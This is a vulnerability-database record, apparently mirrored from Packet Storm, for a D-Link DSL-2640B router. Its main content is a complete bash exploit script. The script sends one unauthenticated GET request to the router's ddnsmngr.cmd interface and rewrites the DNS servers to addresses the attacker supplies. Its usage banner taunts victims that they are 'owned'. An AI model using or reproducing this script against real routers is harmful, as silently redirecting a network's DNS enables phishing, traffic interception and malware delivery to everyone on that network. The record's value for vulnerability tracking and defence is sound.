ID
VAR-E-201703-1035
TITLE
D-Link DSL-2640B Remote DNS Changer
Trust: 0.5
DESCRIPTION
D-Link DSL-2640B remote DNS changing exploit.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | d link | model: | dsl-2640b | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
#!/bin/bash
#
# D-Link DSL-2640B Remote DNS Change Exploit
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Tested On Linux/ubuntu/Debian/All Other Linux
# Compatible Core i86
# Script Bash By Cryptolulz666
# Use This For Educational Purphose
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2640B Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright none public "
echo " security sucks ass "
echo " this server is vuln and you are owned "
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
CREDITS
cryptolulz666
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 141794 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 141794 |
LAST UPDATE DATE
2022-07-27T09:21:29.666000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 141794 | date: | 2017-03-23T05:55:55 |